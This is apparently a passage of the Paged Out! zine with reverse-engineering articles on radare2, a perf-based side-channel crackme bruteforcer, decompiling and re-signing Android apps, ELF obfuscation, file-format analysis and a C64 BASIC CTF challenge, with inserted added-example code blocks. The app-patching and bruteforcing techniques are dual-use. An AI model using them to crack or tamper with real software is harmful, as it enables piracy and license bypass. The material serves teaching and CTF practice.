Basic Concepts 


To open a file in write mode, type: 
r2 -w file 


Welcome to the r2 command line. To understand r2 better I will introduce some concepts first. r2 has a seeker which points to the virtual memory address shown inside the square brackets.


[0x00000b10]>

If you need some help use the command ?.


[0x00000b10]> ? 


| s[?] [addr] seek to address ... 


Do you need some more help with a specific command? 
Just append ? to it. 


[0x00000b10]> s?
| s              Print current address ...


Unlike most OS terminals, the command names are ex- 
tremely puritanical and most of them are abbreviations 
of the actions you would like to perform. So do not be 
surprised about commands like: 


[0x00000b10]> wtf! aF1L3 


Evil to him who evil thinks, because it just (w)rites (t)o 
the (f)ile aF1L3 from current address 0xb10 to the end 
of the mapped memory. This greatly speeds up the 
analysis process, but on the other hand, it takes a lot 
of time to learn it and even more to master. 


Visual Mode 


You can switch to visual mode with the command V and 
come back to the command line mode by pushing [q]. 
In visual mode, you can scroll up and down in a vim-like 
fashion with [j] and [k], as well as enter the command 
line by pushing key [:]. While moving up and down, 
the seeker is updated to the very top memory address 
shown. There are five different print modes which can 
be changed by [p] and [P]. Most of the time reversing 
code, I work in the third, the debugger mode. To auto- 
matically analyse the main function push [:], then type 
the command af@main. Now push [V] to switch to the 
interactive Ascii Art graph which displays a flowchart 
of the analysed function. Move around with [h][j][k][l].
Zoom in with [+], zoom out with [-] and zoom to 100% 
with [0]. If you would like to get some help, just push [?] 
as usual. Rotate through five different modes with [p] 
and [P]. To highlight text, use [/] and type in the text 
you want to be shown highlighted. 


https://youtube.com/channel/UCej7jrdKOsjTTi.GuaWFKcA 


Binary Patching 


The following command (p)rints a he(x)dump of size 
0x8 at the address appended by @. 


:> px 0x8 @0xde0

0xde0  306e 335f 5734 724d  0n3_W4rM


How to (w)rite a (z)ero terminated string at address 0xde0?

:> wz SnwWhite @0xde0


Just push [A] in visual mode to (w)rite some 
(a)ssembler, or use the command line with key [:]. 


:> wa mov edi, 0 @0xa24


Debugging 


For debugging a file in r2, you need to use option -d. 
r2 -d file 


To add a (d)ebug (b)reakpoint at the address sym.main 
plus offset 0x1a0 just type: 


db sym.main+0x1a0


In visual mode, you simply push [s] to move the CPU register RIP one (d)ebug (s)tep forward. Or you can assign a new value to the (d)ebugged (r)egister RAX:


ds; dr rax = 0x12345678 


Misc 


There is one more thing worth mentioning. After I 
started working with r2, I always opened a python con- 
sole for calculations. At that time I did not know that 
there was a much more elegant and easy way. 


:> ?v 0xdead0000 + 0x0000beef
0xdeadbeef


Are you tired and have had enough for today? So let's (q)uit and take a rest. To see radare2 [1] in action, you might be interested in watching a more comprehensive YouTube tutorial [2].


[1] https://www.radare.org
[2] https://www.youtube.com/watch?v=hufgzz8nwNw
Crackme Solving for the Lazies


Because nobody has time to waste on petty crackmes during a CTF, here are two simple side-channel-based tricks to quickly solve the boring ones: the first is for when you know what part of the code is used to display the flag, while the second is for things that you don't even want to look at.


Coverage-guided solving 


Open the binary in your favorite hex editor, which 
should of course be radare2, and patch the 
instructions that are displaying the flag with xor 
eax, eax; mov eax, [eax]; essentially a NULL 
pointer dereference leading to a crash. The final 
step is to throw the modified binary at a 
coverage-guided fuzzer like AFL, and to wait for it to 
trigger a crash: the corresponding input is usually 
the flag you're looking for.


Performance-guided solving

The second trick is a bit similar, but instead of trying to maximize the coverage to eventually find the flag, we're aiming at maximizing the number of executed instructions: simple crackmes will often bail out as soon as possible when checking their input. For example, when naively comparing two strings, they will stop at the first differing character. So the more characters we're able to guess, the more instructions will be executed.

This approach has the nice side effect (pun intended) of guessing the flag character by character, like in the movies!

On Linux, measuring all sorts of low-level metrics can be done via the performance counters infrastructure, exposed to userland via the perf toolsuite. This can easily be wrapped in some Python, as in the script below, to provide a simple-yet-effective bruteforcer. An important detail to consider is the -r parameter, controlling how many times the binary is run before taking the mean value. Without setting it to a "large" (~10) value, other processes' noise will likely skew our measurements.

Moreover, should a given metric, like the number of executed instructions, not yield the flag, it might be worth trying different ones, like the number of executed branch instructions, cache misses of various levels, cpu-cycles, memory accesses, the number of speculatively executed branches, ... side channels are everywhere, you just have to find them!

#!/usr/bin/env python3
import string, shlex, sys
from subprocess import Popen, PIPE

# perf writes its CSV (-x,) report on stderr; the target's own output goes to /dev/null
cmd = 'perf stat -r 25 -x, -e instructions:u %s ' % sys.argv[1]
key = ''
while True:
    maximum = 0, ''
    for i in string.printable:
        c = cmd + shlex.quote(key + i) + ' >/dev/null'
        # communicate() returns (stdout, stderr): the counter report is the second item
        _, stdout = Popen(c, stderr=PIPE, shell=True).communicate()
        nb_instructions = int(stdout.decode('utf-8').split(',')[0])
        if nb_instructions > maximum[0]:
            maximum = nb_instructions, i
    key += maximum[1]
    print(key)
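Why the "more correct characters, more executed instructions" search above works, and what stops it, as an added example that is not from the article: an operation counter stands in for perf's instructions:u, SECRET is a constructed flag, and the alphabet is reduced so the loop runs quickly. The early-exit compare leaks the position of the first mismatch; a compare whose work does not depend on that position gives the search nothing to climb.

```python
"""Instruction-count side channel of an early-exit compare, and the constant-time fix (added example)."""
import hmac

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_{}"   # constructed, smaller than string.printable
SECRET = "flag{s1de}"                                   # constructed


class Counter:
    """Stand-in for a hardware instruction counter."""

    def __init__(self):
        self.ops = 0

    def tick(self):
        self.ops += 1


def strcmp_like(secret, guess, ctr):
    """Early-exit compare typical of a simple crackme: returns at the first differing
    byte, the terminating NUL included. Work done == position of the first mismatch."""
    for x, y in zip(secret + "\0", guess + "\0"):
        ctr.tick()
        if x != y:
            return False
    return True


def constant_time_eq(secret, guess, ctr):
    """Hardened compare: touches every byte of the longer input and folds all
    differences into one accumulator, so the work no longer depends on where the
    first mismatch is (in production use hmac.compare_digest instead)."""
    a, b = secret.encode(), guess.encode()
    n = max(len(a), len(b))
    a, b = a.ljust(n, b"\0"), b.ljust(n, b"\0")
    diff = len(secret) ^ len(guess)
    for x, y in zip(a, b):
        ctr.tick()
        diff |= x ^ y
    return diff == 0


def measure(check, guess):
    """Run one check against SECRET and report how much work it did (perf's role)."""
    ctr = Counter()
    check(SECRET, guess, ctr)
    return ctr.ops


def recover(check, length):
    """Same loop as the perf script: per position, keep the candidate that makes the
    target do the most work."""
    key = ""
    for _ in range(length):
        best = (0, "")
        for c in ALPHABET:
            n = measure(check, key + c)
            if n > best[0]:
                best = (n, c)
        key += best[1]
    return key


if __name__ == "__main__":
    print("early-exit compare   :", recover(strcmp_like, len(SECRET)))       # flag{s1de}
    print("constant-time compare:", recover(constant_time_eq, len(SECRET)))  # no signal: garbage
    print("hmac.compare_digest  :", hmac.compare_digest(SECRET.encode(), b"flag{s1de}"))
```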


Julien Voisin 


CC BY-SA 4.0 


dustri.org 
Android Reverse Engineering!


Have you ever wondered why there are so many cracked apps out there? Well, because Android reversing is simple. OK, it's not that simple, but most developers don't care and thus make the job of reverse engineers easier, because they don't add any protection. You can argue that the more popular an app is, the better protected it is. Keep that in mind when picking your target. First of all, you'll need some tools, because you certainly don't want to do everything from scratch. These are the tools we will be using throughout the article:

- apktool
- dex2jar
- jdgui
- bytecodeviewer

Generating a .jar 
Generally, the first thing you would do, is generate 
a .jar, which is just a simple .zip file. Decompiling 
that by hand would be hard because it contains 
the compiled bytecode, thus we use decompilers 
like jdgui or bytecodeviewer. To generate a .jar 
you need the tool dex2jar. You can simply run this 
command and it'll automatically generate it for 
you. 


d2j-dex2jar.bat <android-app>.apk


Decompiling the apk

However, if you want to edit something in the apk you need the tool apktool. Run this command and a folder will be generated for you with all the source code and resources.

apktool d <android-app>.apk
Opening the .jar

We won't be looking at the smali files (generated 
with apktool) yet, because it's easier to look (and 
search) for stuff in jdgui or bytecodeviewer. You 
can open it via drag and drop or the menu. 

So where do we actually start? The first thing you should do is open the search and just look for classes which implement interesting stuff. For example, you want to find the web API? Simply search for "http". You want to find the app settings? Search for "SharedPreferences". You want to find a special functionality? Just google how you would implement it and then search for the class. Most of the time you won't even need to google it, because you can easily guess it.

[1] Assembly language used by Android

Github: github.com/not-matthias
Twitter: twitter.com/not_matthias
Blog: not-matthias.github.io

Editing 

Once you have found the variable or function you can simply go to the smali [1] files and patch it. To do that you need to find the path where it's stored. In Java there are packages, which are the equivalent of folders. If you scroll to the top in jdgui you should find the package name. After that, simply replace the placeholders and go to the resulting path.


<android-app>/smali/<your-package>/<your-class>.smali


Packing 

Reverse engineering and patching an app is cool, 
but how can we actually install it? 

Building the apk 

To build the decompiled files, you can run this command. The built apk will be located at <android-app>/dist.


apktool b <android-app> 


Creating a new certificate 

To be able to install the apk, you need to sign it. Luckily there are no certificate checks implemented in Android, so we can simply generate our own certificate. The program keytool.exe is part of the JDK and is located in its /bin folder. I recommend adding it to your PATH variable, so you don't have to write the entire path every time.

keytool.exe -genkey -keystore <keystore-name>.keystore -validity 1000 -alias <alias>


Signing the apk 

The last step is simply running this command. Then you can install the apk on any Android device. The program jarsigner.exe is again included in the JDK.

jarsigner.exe -keystore <keystore-name>.keystore -verbose <android-app>.apk <alias>


This article was originally published on not-matthias.github.io 


not-matthias 
WTFPL
Linkedin: https:/
--=[anti-RE for fun]=--


In this article, we will go through a couple of techniques to 
guide the reader towards a path to protect their code. One 
of the methods is to obfuscate the code so much that an 
attacker gets confused while trying to reverse engineer 
the binary. In order to correctly obfuscate an ELF binary, 
we need to understand how an attacker does the analysis 
of a binary. Basically, there are two methods of doing it, 
one is Static Analysis which is done without running the 
binary, just by looking at the disassembly and trying to 
figure out what the binary does. The other method is 
Dynamic Analysis in which an attacker runs the binary and 
traces the execution of the process to figure out what the 
binary is doing. 


Static analysis can be made harder by encrypting all the strings used inside a binary and also loading the libraries dynamically using dlopen() and dlsym() calls, so that the attacker cannot guess the functionality based on the PLT table and the strings embedded inside the binary. One can also add unnecessary jump instructions by using goto statements and then put some bogus fake code in between the jump statements to make the control flow even harder to digest. Another method is to encrypt the binary and make it decrypt itself at runtime. To do this we need to understand the ELF format. For example, say we have a license_check() function which we want to hide: we will force this function into a different section than the usual .text, then we'll encrypt this new section. A decrypting function also needs to be called before we run license_check(), so that when it is actually called the real decrypted code executes. Once we have both encrypting and decrypting functionality we can do all sorts of crazy stuff at runtime.


Disassembly of license_check()
000000000000117f <license_check>:

Original                             | Encrypted
push   rbp                           | adc    al,0x9
mov    rbp,rsp                       | enter  0x9a4,0xc2
sub    rsp,0x10                      | lods   eax,DWORD PTR ds:[rsi]
mov    QWORD PTR [rbp-0x8            | push   rcx
mov    rax,QWORD PTR [rbp            | or     eax,ecx
mov    rdi,rax                       | cmp    al,0xb9
call   8f0 <strlen@plt>              | or     edx,ecx
mov    rsi,rax                       | add    al,0xb9
lea    rdi,[rip+0x2b]                | or     eax,ecx
mov    eax,0x0                       | xchg   BYTE PTR [rcx-0x414149e8],ch
call   920 <printf@plt>              | or     eax,ecx
mov    eax,0x0                       |
leave                                |
ret                                  | .byte 0x82

#define ENC __attribute__((section(".whatever")))
ENC int license_check(char *str){/* code here */}


Now, any function which is defined like above will be stored in the .whatever section. This section will only have the AX (alloc, execute) flags, but in the decrypt function we need to write the decrypted code back to our custom section. For that, we need to change its permissions using mprotect(). We need a pointer to this section. To find its address we need the pointer to the list of section headers and the pointer to the section-name string table, so that we can loop through the sections until we find the .whatever section.


The function searchsec() will look like this:

#include <elf.h>
#include <string.h>
#include <stddef.h>

Elf64_Shdr *searchsec(char *section_name, void *d)
{
    Elf64_Ehdr *elf_header = (Elf64_Ehdr *) d;
    Elf64_Shdr *s_header = (Elf64_Shdr *) ((char *) d + elf_header->e_shoff);
    Elf64_Shdr *shstrtab = &s_header[elf_header->e_shstrndx];
    /* section names are offsets into the .shstrtab string table */
    const char *const strtabptr = (const char *) d + shstrtab->sh_offset;
    const char *name;
    for (int i = 0; i < elf_header->e_shnum; i++) {
        name = strtabptr + s_header[i].sh_name;
        if (strcmp(name, section_name) == 0) return &s_header[i];
    }
    return NULL;
}


While testing several crypters we found out they 
implemented almost the same thing. See also: 


POCRYPT : https://github.com/picoflamingo/pocrypt 
ELFCRYPT : https://github.com/droberson/ELFcrypt 


Dynamic analysis of a binary can also be made harder by obfuscating the control flow. A normal control flow starts with the main() function, then branches out like a tree and eventually comes back to main(), completing the execution. We can make this control flow disorienting by repeatedly calling a function again and again with different arguments and then jumping from the middle of one function to some other function, making the control flow insanely complex. One neat trick is shown by Sergey Bratus and Julian Bangert in the International Journal of PoC || GTFO 0x00, where they mutated a binary such that IDA showed different code than the one which actually got executed. This was because the tools followed the section table, while the kernel follows the program header table, which can set up a completely different address space. This space can then be used to execute completely different code. The general issue that arises with ELF is the difference in parsing the format; this is called a parser differential for ELF and it means that different programs parse the same input slightly differently. When the kernel loads an ELF binary, it doesn't use the ElfX_Shdr, it only needs the ElfX_Phdr to set up the VMAs. Accordingly, we can say that the following ElfX_Ehdr fields are kind of useless at load time: e_shoff, e_shentsize, e_shnum, e_shstrndx. So, if we remove them then the program should still work, but debuggers will have a hard time dealing with the binary.
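Both points above, the section-table walk that searchsec() performs and the parser differential between the section headers and the program headers, as an added example that is not the article's code. The ELF64 image is constructed in memory (placeholder bytes stand in for .text and .whatever) so the demo runs offline; the struct layouts are the standard Elf64_Ehdr/Phdr/Shdr.

```python
"""Section-table view vs. program-header view of a minimal ELF64 (added example)."""
import struct

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
PHDR = struct.Struct("<IIQQQQQQ")           # Elf64_Phdr
SHDR = struct.Struct("<IIQQQQIIQQ")         # Elf64_Shdr
PT_LOAD, SHT_PROGBITS, SHT_STRTAB = 1, 1, 3
SHF_AX = 0x2 | 0x4                          # SHF_ALLOC | SHF_EXECINSTR
BASE = 0x400000


def build_demo_elf():
    """Constructed image: one PT_LOAD segment; sections .text, .whatever, .shstrtab."""
    text = b"\xc3" * 16                      # placeholder code bytes
    whatever = b"\x90" * 16                  # placeholder for the section to be encrypted
    shstrtab = b"\0.text\0.whatever\0.shstrtab\0"
    text_off = EHDR.size + PHDR.size         # 120
    what_off = text_off + len(text)          # 136
    str_off = what_off + len(whatever)       # 152
    sh_off = (str_off + len(shstrtab) + 7) & ~7   # section table, 8-byte aligned (184)
    total = sh_off + 4 * SHDR.size
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8   # ELFCLASS64, LSB, version 1
    ehdr = EHDR.pack(ident, 2, 0x3E, 1, BASE + text_off, EHDR.size, sh_off, 0,
                     EHDR.size, PHDR.size, 1, SHDR.size, 4, 3)
    phdr = PHDR.pack(PT_LOAD, 5, 0, BASE, BASE, total, total, 0x1000)   # flags R+X
    shdrs = SHDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)                     # SHN_UNDEF entry
    shdrs += SHDR.pack(1, SHT_PROGBITS, SHF_AX, BASE + text_off, text_off, len(text), 0, 0, 16, 0)
    shdrs += SHDR.pack(7, SHT_PROGBITS, SHF_AX, BASE + what_off, what_off, len(whatever), 0, 0, 16, 0)
    shdrs += SHDR.pack(17, SHT_STRTAB, 0, 0, str_off, len(shstrtab), 0, 0, 1, 0)
    body = ehdr + phdr + text + whatever + shstrtab
    return body + b"\0" * (sh_off - len(body)) + shdrs


def read_cstr(data, off):
    return data[off:data.index(b"\0", off)]


def find_section(data, name):
    """Section-table view, as searchsec() does it. Returns (offset, size, flags) or None."""
    e = EHDR.unpack_from(data, 0)
    e_shoff, e_shnum, e_shstrndx = e[6], e[12], e[13]
    if e_shoff == 0 or e_shnum == 0:
        return None                          # nothing to walk: no section table
    shdrs = [SHDR.unpack_from(data, e_shoff + i * SHDR.size) for i in range(e_shnum)]
    strtab_off = shdrs[e_shstrndx][4]        # sh_offset of .shstrtab
    for sh in shdrs:
        if read_cstr(data, strtab_off + sh[0]) == name:   # sh_name indexes the string table
            return sh[4], sh[5], sh[2]       # sh_offset, sh_size, sh_flags
    return None


def load_segments(data):
    """Program-header view, what the kernel needs to set up the VMAs."""
    e = EHDR.unpack_from(data, 0)
    segs = []
    for i in range(e[10]):                   # e_phnum
        p = PHDR.unpack_from(data, e[5] + i * PHDR.size)   # e_phoff
        if p[0] == PT_LOAD:
            segs.append((p[2], p[3], p[5], p[6], p[1]))   # offset, vaddr, filesz, memsz, flags
    return segs


def strip_section_table(data):
    """Zero e_shoff, e_shentsize, e_shnum and e_shstrndx: the loader never reads them."""
    e = list(EHDR.unpack_from(data, 0))
    e[6] = e[11] = e[12] = e[13] = 0
    return EHDR.pack(*e) + data[EHDR.size:]


if __name__ == "__main__":
    elf = build_demo_elf()
    print("section view :", find_section(elf, b".whatever"))          # (136, 16, 6)
    stripped = strip_section_table(elf)
    print("after strip  :", find_section(stripped, b".whatever"))     # None
    print("loader view  :", load_segments(stripped) == load_segments(elf))   # True
```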


While these techniques sometimes seem too hard to 
crack, it’s actually just a matter of time until someone will 
figure out the protections and break them. 


More info : 


http://phrack.org/issues/58/5.html 
http://shell-storm.org/blog/Linux-process-execution-and-the-usel 


Website: https://www.abs0lut3pwn4g3.cf
LinkedIn: www.linkedin.com/company/abs0lut3pwn4g3
Reverse Engineering File Format From Scratch


Usually file structures are well documented, with open-source parsers available, but that's not always the case. In this article we will take a look at a case study of reverse engineering After Effects' project file - this will serve a dual purpose of demonstrating how we can understand the file structure of an undocumented format and showing that it's not as scary as one may think. Based on the acquired knowledge we should be able to build a file parser and extract information.


The first thing I did was open the file in a hex editor to get a general feeling for it, and I also ran the "file" tool to learn what I could about the file format.


In this example it was revealed to be a big-endian RIFF file. While learning more about it I also wanted to better understand how these files are used inside AE. Since AE is pretty huge I didn't want to RE the binaries just yet, and hopefully could skip that altogether. AE allows us to "Save As > Save a Copy As XML", which caught my attention, since it meant the file structure can be represented in a more human-readable way. It also might help me make heads or tails of the ASCII strings I saw in the hex editor - note the similarities between these two files - "svap", "head", "nhed", etc:


<svap bdata="072b8e06"/>
<head bdata="00570001072b8e0680000000000eeee100000001"/>
<nhed bdata="9000000000000005000101001e100200000004e4170872e000000000fffffffe"/>
<adfr bdata="40e7700000000000"/>
<CapI><string/></CapI>


https://www.linkedin.com/in/ido-filus-6783b812b/ 
Ido Filus


Noticing this, I quickly forgot about researching the RIFF file and focused on building a parser for the XML (since it looked less scary than the binary data in the original .aep files). Using the reference of the XML format I learned how single tags, children, attributes, arrays etc. are represented. When building the parser I just made it parse recursively until it hit a point it couldn't continue through. Then I determined the problem, fixed it, and iterated - and quite quickly my parser was able to finish parsing all the nodes and data in the file.


Since the parser could already understand some project properties described as XML tags, I managed to extract the composition name (which is kind of a layer grouping in AE). From there I could work on understanding the meaning of certain tags and the data they contain - it seemed most of the data was found in the bdata attribute in a binary format.


The easiest way to go about it was to start with an 
empty project to minimize the amount of data (and 
export it) and then add layers we know the meaning 
of, and do a diff between the old and new exports. 
Do note that it's also beneficial to use the same 
approach for multiple empty projects to understand 
where variable data (such as timestamp/etc) is 
stored. 


As for the binary data, we can try to parse it in 
different formats such as integers, floats or/and text 
and see what makes the most sense. Once we 
focus on an area in the file, we should be able to 
figure out the “effect” and “settings” of the layer it 
affects. 


We can keep researching the differences and guessing the types until we're satisfied we know enough. It's important to also ask yourself how you would implement the AE format details - perhaps its authors used a similar approach. Eventually you can also search the program/process memory for strings or data we can see in the program's UI itself - it may reveal structures used nearby, such as a class instance that represents a given type of data. Or even search for the bdata value itself and look around its memory area to learn more.
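The two techniques above, reading a bdata blob as integers, floats and text until one makes sense, and diffing two exports of the same node, as an added example that is not the article's parser. The sample nodes are the ones quoted in the article; what a decoded number means is a guess (the adfr value reads as the double 48000.0, which looks like an audio sample rate, but AE's format is undocumented and the article does not say so).

```python
"""Candidate readings of AE bdata blobs and a byte-level diff of two exports (added example)."""
import re
import struct

SAMPLE_XML = """
<svap bdata="072b8e06"/>
<head bdata="00570001072b8e0680000000000eeee100000001"/>
<adfr bdata="40e7700000000000"/>
<CapI><string/></CapI>
"""   # nodes quoted in the article


def parse_bdata_tags(xml_fragment):
    """Collect (tag, bytes) for every <tag bdata="hex"/> node."""
    return [(m.group(1), bytes.fromhex(m.group(2)))
            for m in re.finditer(r'<(\w+)\s+bdata="([0-9a-fA-F]+)"', xml_fragment)]


def candidates(blob):
    """Every fixed-width reading that fits the blob's length; big-endian first, since
    the container was identified as a big-endian RIFF."""
    n = len(blob)
    out = {"hex": blob.hex(),
           "ascii": "".join(chr(b) if 32 <= b < 127 else "." for b in blob)}
    for width, code, label in ((2, "H", "u16"), (4, "I", "u32"), (8, "Q", "u64")):
        if n % width == 0:
            out[label + "_be"] = list(struct.unpack(">%d%s" % (n // width, code), blob))
            out[label + "_le"] = list(struct.unpack("<%d%s" % (n // width, code), blob))
    if n % 4 == 0:
        out["f32_be"] = list(struct.unpack(">%df" % (n // 4), blob))
    if n % 8 == 0:
        out["f64_be"] = list(struct.unpack(">%dd" % (n // 8), blob))
    return out


def plausible_floats(blob):
    """Keep only 'reasonable' doubles: finite, not tiny, not astronomically large."""
    vals = candidates(blob).get("f64_be", [])
    return [v for v in vals if v == v and 1e-6 < abs(v) < 1e12]


def diff_blobs(old, new):
    """Byte offsets that changed between two exports of the same node (the
    empty-project-versus-one-change approach from the article)."""
    n = max(len(old), len(new))
    return [i for i in range(n) if old[i:i + 1] != new[i:i + 1]]


def report(xml_fragment):
    """tag -> candidate readings, for eyeballing which interpretation makes sense."""
    return {tag: candidates(blob) for tag, blob in parse_bdata_tags(xml_fragment)}


if __name__ == "__main__":
    for tag, c in report(SAMPLE_XML).items():
        print(tag, c["hex"], c.get("u32_be"), c.get("f64_be"))
```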


Ido Filus 
Back to the BASICs


The theme of the Google CTF 2018 Qualification round was "history of hacking" - and what better way to celebrate it than to make a Commodore 64 reverse-engineering challenge [1] in pure BASIC? Actually, my original idea was to do a 6510 assembly challenge, and so I spent a few hours watching Michal Taszycki's C64 assembly tutorial series [2] that I bought some time ago. A couple of episodes touched on the internals of the C64 BASIC interpreter and, after I heard about the way the program is stored in memory, a couple of ideas sprang into my mind.

So BASIC it was. 

To cut to the chase (and get a bit more technical), a typical BASIC program looks like this:

10 PRINT "HI"
20 GOTO 10

And it's stored in memory (and in .prg format) as a singly-linked list starting at address 0x801:


Each list node consists of a next pointer (2 bytes 
Little Endian), the line number (yes, that's what 
these prefix numbers are; also 2 bytes LE), and 
then the null-terminated dictionary-compressed 
line content (i.e. BASIC keywords are encoded as 
0x80+keyword_index, where the keyword_index is 
taken from a dictionary hardcoded inside the 
BASIC interpreter [3]). And the list is terminated 
with an additional empty node consisting of only a 
NULL pointer in the next field. 

It has to be noted that storing a program in a linked list of lines is pretty unusual by today's standards. On the flip side, imagine all the possibilities this gives one to mess with players trying to reverse it! Let's start with the pretty simple and obvious fact that line numbers don't really matter too much. True, both GOTO and GOSUB, and a few other commands use them, but apart from jump targets most lines can have identical line numbers. If one keeps them non-decreasing the program should work just fine - not the case for BASIC's "editor", but it's OK if we only care about running the code.

Moving to more interesting things, since the format of the list is pretty simple, it's equally simple to use SMC (Self-Modifying Code) techniques (i.e. POKE). For instance, the program can - at rest - consist of a single line - at least as far as the LIST command is concerned. When executed, this line would change the next field of the next node from a NULL pointer to a proper value, thus allowing the execution to continue (the second line should probably "close the door", i.e. put the NULL pointer back in place; this will break backward jumps though).

Actually, a more fun way to tackle the problem of 
"break+LIST disclosing the source code that we 
want to hide" is to make a node point back at itself - 
again, at runtime - using SMC: 


[Figure: memory dump of the list nodes around $8A0 and $8AB (lines 1990, 2000, 2010) after the next pointer of one node was rewritten to point at the node itself] 

Running the LIST command in such a case results in: 

[Figure: screenshot of the resulting LIST output] 


And last but not least, being able to use SMC means 
one's also able to encrypt (obfuscate) selected 
nodes, and decrypt (deobfuscate) them at runtime. 
So, how do we do all of this using the C64 BASIC 
editor/interpreter? No idea. To create this 
challenge, I had to write my own BASIC "compiler" 
—I called it CrackBASIC because it was made for the 
sole purpose of creating this CrackMe (also, 
because it's BASIC on crack). It has a couple of nice 
features, like being able to calculate node 
addresses of specific lines at compilation time or 
encrypt selected parts of the code. You can check it 
out in the challenge's source directory. 
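Added example, not from the article and not part of CrackBASIC: a Python walker for the .prg node chain described above, with loop detection so that a node pointing at itself is reported instead of being followed forever, plus a poke_next helper that simulates the runtime POKE of a next field. The two-line program, the TOKENS subset and all function names are constructed for this example.

```python
import struct

# Subset of the C64 BASIC V2 keyword table (token = 0x80 + index).  Taken
# from the public token list; any token missing from this subset is rendered
# as {tok:0xNN} rather than guessed.
TOKENS = {
    0x80: "END", 0x81: "FOR", 0x82: "NEXT", 0x83: "DATA", 0x85: "INPUT",
    0x86: "DIM", 0x87: "READ", 0x88: "LET", 0x89: "GOTO", 0x8A: "RUN",
    0x8B: "IF", 0x8D: "GOSUB", 0x8E: "RETURN", 0x8F: "REM", 0x90: "STOP",
    0x97: "POKE", 0x99: "PRINT", 0x9B: "LIST", 0x9E: "SYS", 0xA4: "TO",
    0xA7: "THEN", 0xAA: "+", 0xAB: "-", 0xB2: "=", 0xC2: "PEEK",
}

LOAD_ADDR = 0x0801  # where a C64 BASIC program lives in memory


def build_prg(lines):
    """Constructed helper: serialise (line_number, tokenised_body) pairs into
    a .prg image: 2-byte load address, then the node chain, then the empty end
    node.  Each node is next pointer (LE16), line number (LE16), body, NUL."""
    out = bytearray(struct.pack("<H", LOAD_ADDR))
    addr = LOAD_ADDR
    for lineno, body in lines:
        addr += 2 + 2 + len(body) + 1          # address of the following node
        out += struct.pack("<HH", addr, lineno) + body + b"\x00"
    out += b"\x00\x00"                         # terminator: NULL next field
    return bytes(out)


def poke_next(prg, node_addr, value):
    """Simulate the SMC trick from the article: POKE a new 16-bit next
    pointer into the node at node_addr.  Returns the modified image."""
    off = 2 + (node_addr - LOAD_ADDR)
    return prg[:off] + struct.pack("<H", value) + prg[off + 2:]


def detokenize(body):
    # Bytes >= 0x80 are keyword tokens; everything else is PETSCII/ASCII text.
    return "".join(TOKENS.get(b, "{tok:0x%02X}" % b) if b >= 0x80 else chr(b)
                   for b in body)


def walk_prg(prg):
    """Walk the node chain the way LIST does, but remember every node address
    visited, so a node that points at itself (or any longer cycle) is reported
    instead of looping forever.  Returns (lines, (reason, addr))."""
    base = struct.unpack_from("<H", prg, 0)[0]
    mem = prg[2:]

    def read(addr, n):
        off = addr - base
        if off < 0 or off + n > len(mem):
            raise ValueError("pointer $%04X points outside the image" % addr)
        return mem[off:off + n]

    seen, lines, addr = set(), [], base
    while True:
        if addr in seen:
            return lines, ("loop", addr)       # the LIST trap from the article
        seen.add(addr)
        nxt = struct.unpack("<H", read(addr, 2))[0]
        if nxt == 0:
            return lines, ("end", addr)        # NULL next field ends the list
        lineno = struct.unpack("<H", read(addr + 2, 2))[0]
        body, p = bytearray(), addr + 4
        while (b := read(p, 1)[0]) != 0:       # null-terminated line content
            body.append(b)
            p += 1
        lines.append((addr, lineno, detokenize(bytes(body))))
        addr = nxt


# Constructed two-line program: 10 PRINT"HELLO" / 20 GOTO 10
PROGRAM = build_prg([(10, b'\x99"HELLO"'), (20, b"\x89 10")])
NODE1, NODE2, END = 0x0801, 0x080E, 0x0817

if __name__ == "__main__":
    print("as loaded:", walk_prg(PROGRAM))
    print("door closed, line 20 hidden from LIST:",
          walk_prg(poke_next(PROGRAM, NODE2, 0)))
    print("node pointing at itself:",
          walk_prg(poke_next(PROGRAM, NODE2, NODE2)))
```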

And that's it! I encourage you to try to solve the 
challenge yourself - there are a few more surprises 
there. 


Gynvael Coldwind 


[1] https://github.com/google/google-ctf/tree/master/2018/quals/re-basics 

[2] https://64bites.com/ 

[3] https://www.c64-wiki.com/wiki/BASIC_token 


https://twitter.com/gynvael 
https://gynvael.coldwind.pl/ 
https://www.youtube.com/c/GynvaelEN/ 
Advertisement 


This is a placeholder ad (since we had an odd number of ads). At the same 
time, it's a great opportunity to explain how ads work in Paged Out! 


First of all, we have two kinds of ads in our zine: 


Community Ads 
These are free to publish, but are restricted to free projects / tutorials / 
tools / etc - basically we want to advertise cool community-made stuff. 


Sponsorship Ads 
These help us cover the costs of making Paged Out! - thank you! 


Secondly, we'll keep the number of ads to a minimum - this means the zine 
will have at most 1 ad page for every 10 articles. 


And that's it. In case you would like to publish a Community Ad, or support 
us with a Sponsorship Ad, please check out the details at: 
https://pagedout.institute/?page=ads.php 
Infection Monkey 


How Resilient Is 
Your Network to 
Advanced Threats? 


Unleash the Infection Monkey in your network 
and discover security flaws in no time. 


The Infection Monkey is an open source Breach and Attack Simulation 
(BAS) tool that assesses the resiliency of private and public cloud 
environments to post-breach attacks and lateral movement. 


www.infectionmonkey.com | powered by Guardicore | GitHub: github.com/guardicore/monkey 
AndroidProjectCreator 


Analysing decompiled Android malware code is a tedious task. 
AndroidProjectCreator aims to improve the effectiveness of this analysis 
by providing you with an easy-to-use toolkit. 


So how does it work? 

AndroidProjectCreator is a command-line application that is written in 
Java and serves as a single interface for numerous tools that are used to 
decode and decompile an APK, such as dex2jar¹ or JADX². After decoding the 
resources and decompiling the code, an Android Studio project is created 
based on the newly obtained data. 


Why an Android Studio project? 

Existing open-source tools provide decompiled code, although there is a 
problem when one wants to remove or refactor code: more often than not, 
tools lack support for this feature. Android Studio is always up-to- 
date, as it is used to create Android applications. This way, the power of 
the tool is leveraged for a (potentially) unintended purpose. 


A demo 


What better to show people than a wall of text? As is commonly said: “a 
picture is worth a thousand words”. This demo will serve as a picture. 


The dependencies used require the Java 8 JDK. Simply passing the 
"-install" parameter to the JAR will start the installation. The 
installation will commence in the directory where the JAR resides, 
regardless of the terminal's current working directory. 


After the installation is complete, the help menu is shown, together with 
the installation results. To decompile an application, simply call the JAR 
from anywhere on the machine and provide the required parameters: 


java -jar /path/to/AndroidProjectCreator.jar -decompile fernflower /samples/sms-stealer.apk ./sms-stealer-fernflower 


The “-decompile” argument specifies the mode in which 
AndroidProjectCreator needs to operate. The “fernflower” decompiler is 
